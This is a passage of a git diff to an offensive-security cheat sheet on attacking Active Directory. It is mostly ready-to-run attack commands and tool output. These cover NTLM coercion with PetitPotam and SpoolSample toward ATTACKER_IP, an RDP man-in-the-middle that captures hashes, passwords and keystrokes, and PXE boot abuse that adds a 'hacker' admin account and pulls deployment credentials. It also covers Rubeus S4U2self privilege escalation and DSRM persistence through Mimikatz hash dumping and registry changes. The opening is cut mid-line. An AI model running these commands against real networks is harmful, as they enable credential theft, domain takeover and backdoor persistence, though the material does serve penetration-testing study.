nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. + ```ps1 + # PrinterBug + dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + SpoolSample.exe "ATTACKER_IP" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" + + # PetitPotam + Petitpotam.py "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + ``` +* Use the created account to ask for a service ticket: + ```ps1 + .\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l +pyrdp-mitp.py : # with custom port +pyrdp-mitm.py -k private_key.pem -c certificate.pem # with custom key and certificate +``` +* Exploitation + * If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge + * If NLA is disabled, you will obtain the password in plaintext + * Other features are available such as keystroke recording +* Alternatives + * S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener \ No newline at end of file diff --git a/docs/active-directory/internal-pxe-boot-image.md b/docs/active-directory/internal-pxe-boot-image.md new file mode 100644 index 0000000..06a6f3d --- /dev/null +++ b/docs/active-directory/internal-pxe-boot-image.md @@ -0,0 +1,49 @@ +# Internal - PXE Boot Image + +PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it. + +- Press **[F8]** during the PXE boot to spawn an administrator console on the deployed machine. +- Press **[SHIFT+F10]** during the initial Windows setup process to bring up a system console, then add a local administrator or dump SAM/SYSTEM registry. + + ```powershell + net user hacker Password123! /add + net localgroup administrators /add hacker + ``` + +- Extract the pre-boot image (wim files) using [PowerPXE.ps1 (https://github.com/wavestone-cdt/powerpxe)](https://github.com/wavestone-cdt/powerpxe) and dig through it to find default passwords and domain accounts. + + ```powershell + # Import the module + PS > Import-Module .\PowerPXE.ps1 + + # Start the exploit on the Ethernet interface + PS > Get-PXEcreds -InterfaceAlias Ethernet + PS > Get-PXECreds -InterfaceAlias « lab 0 » + + # Wait for the DHCP to get an address + >> Get a valid IP address + >>> >>> DHCP proposal IP address: 192.168.22.101 + >>> >>> DHCP Validation: DHCPACK + >>> >>> IP address configured: 192.168.22.101 + + # Extract BCD path from the DHCP response + >> Request BCD File path + >>> >>> BCD File path: \Tmp\x86x64{5AF4E332-C90A-4015-9BA2-F8A7C9FF04E6}.bcd + >>> >>> TFTP IP Address: 192.168.22.3 + + # Download the BCD file and extract wim files + >> Launch TFTP download + >>>> Transfer succeeded. + >> Parse the BCD file: conf.bcd + >>>> Identify wim file : \Boot\x86\Images\LiteTouchPE_x86.wim + >>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim + >> Launch TFTP download + >>>> Transfer succeeded. + + # Parse wim files to find interesting data + >> Open LiteTouchPE_x86.wim + >>>> Finding Bootstrap.ini + >>>> >>>> DeployRoot = \\LAB-MDT\DeploymentShare$ + >>>> >>>> UserID = MdtService + >>>> >>>> UserPassword = Somepass1 + ``` diff --git a/docs/active-directory/internal-shares.md b/docs/active-directory/internal-shares.md index 5bf4dc5..75bc366 100644 --- a/docs/active-directory/internal-shares.md +++ b/docs/active-directory/internal-shares.md @@ -1,4 +1,4 @@ -# Shares +# Internal - Shares ## READ Permission diff --git a/docs/active-directory/kerberos-s4u.md b/docs/active-directory/kerberos-s4u.md new file mode 100644 index 0000000..d0c81a3 --- /dev/null +++ b/docs/active-directory/kerberos-s4u.md @@ -0,0 +1,26 @@ +# Kerberos Service for User Extension + +* **Service For User To Self** which allows a service to obtain a TGS on behalf of another user +* **Service For User To Proxy** which allows a service to obtain a TGS on behalf of another user on another service + +## S4U2self - Privilege Escalation + +1. Get a TGT + * Using Unconstrained Delegation + * Using the current machine account: `Rubeus.exe tgtdeleg /nowrap` +2. Use that TGT to make a S4U2self request in order to obtain a Service Ticket as domain admin for the machine. + ```ps1 + Rubeus.exe s4u /self /nowrap /impersonateuser:"Administrator" /altservice:"cifs/srv001.domain.local" /ticket:"base64ticket" + Rubeus.exe ptt /ticket:"base64ticket" + + Rubeus.exe s4u /self /nowrap /impersonateuser:"Administrator" /altservice:"cifs/srv001" /ticket:"base64ticket" /ptt + ``` + +The "Network Service" account and the AppPool identities can act as the computer account in terms of Active Directory, they are only restrained locally. Therefore it is possible to invoke S4U2self if you run as one of these and request a service ticket for any user (e.g. someone with local admin rights, like DA) to yourself. + +```ps1 +# The Rubeus execution will fail when trying the S4UProxy step, but the ticket generated by S4USelf will be printed. +Rubeus.exe s4u /user:${computerAccount} /msdsspn:cifs/${computerDNS} /impersonateuser:${localAdmin} /ticket:${TGT} /nowrap +# The service name is not included in the TGS ciphered data and can be modified at will. +Rubeus.exe tgssub /ticket:${ticket} /altservice:cifs/${ServerDNSName} /ptt +``` \ No newline at end of file diff --git a/docs/active-directory/pwd-dsrm-credentials.md b/docs/active-directory/pwd-dsrm-credentials.md new file mode 100644 index 0000000..d5927ab --- /dev/null +++ b/docs/active-directory/pwd-dsrm-credentials.md @@ -0,0 +1,18 @@ +# Password - DSRM Credentials + +> Directory Services Restore Mode (DSRM) is a safe mode boot option for Windows Server domain controllers. DSRM allows an administrator to repair or recover to repair or restore an Active Directory database. + +This is the local administrator account inside each DC. Having admin privileges in this machine, you can use Mimikatz to dump the local Administrator hash. Then, modifying a registry to activate this password so you can remotely access to this local Administrator user. + +```ps1 +Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' + +# Check if the key exists and get the value +Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior + +# Create key with value "2" if it doesn't exist +New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD + +# Change value to "2" +Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 +``` \ No newline at end of file